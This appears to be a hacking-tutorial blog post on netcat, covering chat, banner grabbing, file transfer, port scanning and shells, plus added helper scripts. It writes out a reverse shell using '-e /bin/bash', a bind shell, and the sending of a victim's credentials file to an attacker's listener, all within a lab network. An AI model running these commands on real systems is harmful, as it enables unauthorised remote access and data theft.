Netcat Tool


Netcat is also known as the Swiss army knife of networking: it is used for file sharing, reverse shells, banner grabbing, port scanning, and we can even use it to chat! Interesting, right? netcat, nc and Ncat all do the same job, but what makes Ncat special is that it can encrypt its traffic; unlike netcat and nc, however, it does not come pre-installed. Now let's stop beating around the bush and get our hands dirty.
First, let's look at some of the commonly used netcat options:

Fig:1.0


1) -l option: listen mode. It opens a port on our system and waits for other computers to connect.

2) -v option: verbose mode. When we try to connect to another system the request may be timed out or refused, and without -v those messages are not shown to us, so it is always recommended to use -v.

3) -p option: specifies the port we want to scan or listen on.

4) -w option: sets a timeout. When we connect to a network there may be a firewall defending it and dropping our packets without our knowledge, and we would keep sending packets and wasting time. So we set a timeout: say we are sending packets to a particular port and set the timeout to 5 seconds, which means wait 5 seconds for a response and, if none arrives, move on to the next port or quit if there isn't one.

5) -n option: when we give an IP address instead of a hostname there is no need for the tool to do DNS resolution, so this option tells netcat not to resolve names and to connect directly.

6) -e option: executes a program through netcat once a connection is made. This option is very powerful and dangerous, and gold for us as hackers.

7) -z option: used to perform a port scan.

Don't worry if this doesn't make sense yet; this is just an overview, and now let me go through all the options one by one in practice.

TCP Chat with netcat : 

netcat can create a simple TCP or UDP connection between two computers and then open a communication channel between them. Let's open a listener on the remote system first, i.e. on the Windows 10 machine.

Command: 

ncat -lvp 99

Here -l means listen and -p specifies the port the machine listens on, so we could say that we are waiting for connections on port 99.
On the other host (Linux) we connect to the port our Windows machine is listening on:

Command:

ncat -v 192.168.0.116 99

Here we gave the IP address and port we want to connect to, and -v gives more information about the connection.

Without -v in both commands you will not get the version message and the "listening" message, nor the "connection from <ip address>" status on the server side (Windows machine) and the "connected to" status on the Linux machine after the connection is made.

Now that the connection is made you can communicate, as you can see in Fig:1.1. Press Ctrl+C when you are done with the fun.

Fig:1.1


Banner Grabbing :

What is the meaning of banner grabbing?
Banner grabbing is the act of capturing the information provided by banners, configurable text-based welcome screens from network hosts that generally display system information. Banners are intended for network administration.

We connect to a web server, local or on the internet, and send an HTTP request to get a response, so that we can analyse the headers and learn the type and version of software the web server is running, and inspect much more.
Command:

ncat -n 142.250.206.142 80

Here the IP address belongs to the host www.google.com, and the -n option says there is no need to do domain resolution because we have given the raw IP address itself. Now generate the request by typing: HEAD / HTTP/1.1 and, on the next line, Host: www.google.com

Now press Enter a few times and you will receive the response headers, from which you can read which web server software and version is in use. Fig:1.2

Fig:1.2
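As an added example (not code from the original post), the same banner grab as a small POSIX shell script: it builds the HEAD request the post types by hand, sends it with nc, and pulls the Server: header out of the reply so you can check what version information your own web server is exposing. The host name, port and sample response are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the original post. Banner grab with netcat:
# build the HEAD request, send it, extract the Server: header.

# Build the minimal request. HTTP/1.1 needs a Host: header, every line ends
# in CRLF, and the empty line terminates the request. Connection: close asks
# the server to hang up, so netcat exits instead of waiting for more data.
build_head_request() {   # $1 = host name
    printf 'HEAD / HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' "$1"
}

# Read a raw HTTP response on stdin and print the value of its Server: header
# (empty if absent). Header names are case-insensitive, CRs are stripped, and
# reading stops at the blank line that ends the header block.
server_header() {
    tr -d '\r' | sed -n '/^$/q; s/^[Ss][Ee][Rr][Vv][Ee][Rr]:[[:space:]]*//p' | head -n 1
}

# Send the request to host:port the way the post does ("ncat -n IP 80").
# -w 5 gives up after 5 seconds so a firewall that drops packets cannot hang us.
grab_banner() {          # $1 = host name, $2 = port
    build_head_request "$1" | nc -w 5 "$1" "$2"
}

# Constructed sample response, so the parsing part can be shown offline.
sample_response() {
    printf 'HTTP/1.1 200 OK\r\nDate: Mon, 01 Jan 2024 00:00:00 GMT\r\n'
    printf 'Server: Apache/2.4.57 (Debian)\r\nContent-Type: text/html\r\n\r\n'
}

# Offline demo. For a live host: grab_banner www.example.com 80 | server_header
echo "Server header in the sample response: $(sample_response | server_header)"
```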



Sharing Files :

Before getting to the real thing, let's first talk about redirection, which plays a crucial role in sharing files through netcat.

Echo command:

echo "haha" , this returns an output haha and the output will be displayed onto the screen

echo "haha" > file.txt , this means : as always echo returns the output haha but the output is redirected to the file file.txt

Cat command:

cat file.txt: the cat command opens and reads the file and then displays its contents.

cat < file.txt: similar to cat file.txt, but here the file is not opened by cat directly; instead the shell opens the file and feeds its contents to cat as its input.

Now that we are all clear on this, let's move on...

Storing message into a file using netcat tool :

Here the Linux machine is listening on port 99 and redirecting the received data into a file called credentials.txt. I then connected to the Linux machine from my Windows machine and, as you can see, sent a username and password. They were not displayed on the Linux screen; they were redirected into the file credentials.txt, and after terminating the connection I displayed the content of the file in the terminal with the cat command. Fig:1.3

Fig:1.3


Downloading files from remote host : 

Point of view: you are the attacker, who is the listener and receiver. The command on the attacker (listener) side:

Command: 

ncat -lvp 99 > remotefile.txt

This command says: whatever data you receive, save it into the file remotefile.txt; in other words, the data we get from the victim is redirected into remotefile.txt instead of being displayed on the screen. On the victim side the command is:

ncat 192.168.32.32 99 < credentials.txt

Here you are reading the data inside the file (not directly, as we discussed before) and sending it to the other side. You can see I used cmd instead of PowerShell because PowerShell does not support this redirection, and this is how you can get a file from a remote server or system as an attacker using netcat. Fig:1.4

Fig:1.4



Uploading files onto remote machine using netcat : 

Point of view: here we are the attacker who wants to send a malicious file to the remote host, using the command (on the sender or listener side):

Command:
                                 
ncat -lvp 99 < malware.py

(the content of the file is: print("Malware Executed !!"))

Now, unlike receiving data, we want to send data to whoever connects to our system, so the redirection symbol is now less-than (<). On the receiver side:

Command:                                                                           

ncat 192.168.32.32 99 > safefile.py

Here we need to save the data into a file, so the redirection symbol is greater-than (>). Remember that we do not send the file or a copy of the file; we send the data of the file. If we leave out the > safefile.py on the connecting (receiver) side, the data of the file is simply printed to the terminal screen. Fig:1.5

Fig:1.5
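As an added example (not code from the original post), the download and upload procedures above as one POSIX shell script run on the loopback interface: the receiver is the post's "ncat -lvp 99 > remotefile.txt", the sender is "ncat HOST 99 < credentials.txt", and because only the bytes of the file travel across, the script compares SHA-256 checksums afterwards to prove the copy is intact. It assumes an nc that accepts "-l -p PORT" (ncat, netcat-openbsd or netcat-traditional); the port and the sample file are constructed.

```shell
#!/bin/sh
# Added example, not from the original post. File transfer with netcat over
# loopback, verified with sha256sum. Assumes nc accepts "-l -p PORT".

# Receiver, like the post's "ncat -lvp 99 > remotefile.txt". Runs in the
# background; its pid is kept so the caller can wait for it to finish.
start_receiver() {       # $1 = port, $2 = output file
    nc -l -p "$1" > "$2" 2>/dev/null &
    receiver_pid=$!
}

# Sender, like "ncat HOST 99 < credentials.txt". -w 2 makes nc give up after
# 2 idle seconds once stdin is exhausted instead of waiting forever.
send_file() {            # $1 = host, $2 = port, $3 = input file
    nc -w 2 "$1" "$2" < "$3" 2>/dev/null
}

# Netcat never sends "the file", only its bytes, so verify the result:
# returns 0 if both files hash the same, 1 otherwise.
same_checksum() {        # $1 = file A, $2 = file B
    [ "$(sha256sum < "$1")" = "$(sha256sum < "$2")" ]
}

# Copy $1 to $2 through port $3 on 127.0.0.1 and verify it.
# Returns 0 on an intact copy, 1 on mismatch, 2 if nc is not installed.
transfer_and_verify() {  # $1 = source, $2 = destination, $3 = port
    command -v nc >/dev/null 2>&1 || return 2
    start_receiver "$3" "$2"
    sleep 1                               # let the listener bind first
    send_file 127.0.0.1 "$3" "$1"
    ( sleep 10; kill "$receiver_pid" 2>/dev/null ) >/dev/null 2>&1 &
    wait "$receiver_pid"                  # watchdog above stops a hang
    kill $! 2>/dev/null || true           # watchdog no longer needed
    same_checksum "$1" "$2"
}

# Constructed sample run: a throwaway "credentials.txt" like the one in the post.
tmp=$(mktemp -d)
printf 'username=alice\npassword=constructed-sample\n' > "$tmp/credentials.txt"
if transfer_and_verify "$tmp/credentials.txt" "$tmp/remotefile.txt" 9991; then
    echo "transfer ok, checksums match"
else
    rc=$?; echo "transfer failed or nc not installed (exit $rc)"
fi
rm -rf "$tmp"
```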


Reverse shell with netcat : 

Here let us consider our Linux machine as the victim and our Windows machine as the attacker machine. We are listening on port 99 on our Windows machine:

Command :                                                               

ncat -lvp 99

and we make a connection from our Linux machine to our Windows machine, handing it our shell with

Command :                               

ncat 192.168.0.115 99 -e /bin/bash

(192.168.0.115 is the Windows machine's IP)

This is called a reverse shell. The -e option means execute the given program, and you can see I am able to run Linux commands from the Windows machine. Fig:1.7

Fig:1.7


This is the other way round of making the connection; you could try it yourself. Here we are listening on our Linux machine and giving a shell to whoever connects to us!! Fig:1.8

Fig:1.8



Port scanning with netcat :

Here we have started an Apache server on the Linux machine, running on port 80, and we scanned port 80 on the Linux machine using the

Command:

ncat -zvw 2 192.168.0.105 80

In the command the -z option says we are about to scan a port on a host, and -w sets the timeout, here 2 seconds: if the remote host does not reply within 2 seconds, ncat disconnects and displays TIMEOUT on the terminal screen. Fig:1.9

Fig:1.9
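As an added example (not code from the original post), the single-port check above generalised to a list of ports in POSIX shell with the same -z and -w options, so you can audit which services on a host you administer are reachable. The port list is constructed, and it assumes an nc that exits 0 when the connection succeeds (ncat, netcat-openbsd and netcat-traditional all do).

```shell
#!/bin/sh
# Added example, not from the original post. Port check with netcat's
# zero-I/O mode, generalised from the post's "ncat -zvw 2 IP 80" to a list.

# Probe one port. -z connects and disconnects without sending any data;
# -w 2 gives up after 2 seconds, which is what you see as TIMEOUT when a
# firewall silently drops the packets instead of refusing the connection.
port_is_open() {         # $1 = host, $2 = port; exit 0 means open
    nc -z -w 2 "$1" "$2" >/dev/null 2>&1
}

# Probe every port named after the host and print one line per port.
# Returns 0 after scanning, or 2 if nc is not installed.
scan_ports() {           # $1 = host, $2... = ports
    command -v nc >/dev/null 2>&1 || return 2
    host=$1; shift
    for port in "$@"; do
        if port_is_open "$host" "$port"; then
            echo "$host:$port open"
        else
            echo "$host:$port closed or filtered"
        fi
    done
}

# Count the open ports in scan_ports output (handy for a quick audit report).
count_open() {
    grep -c ' open$' || true
}

# Constructed sample run against the local machine: port 1 is almost never
# in use, so it should report closed; 80 is open only if a web server such
# as the post's Apache is listening.
result=$(scan_ports 127.0.0.1 1 80) || echo "nc is not installed"
echo "$result"
echo "open ports: $(echo "$result" | count_open)"
```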



                           Thank You

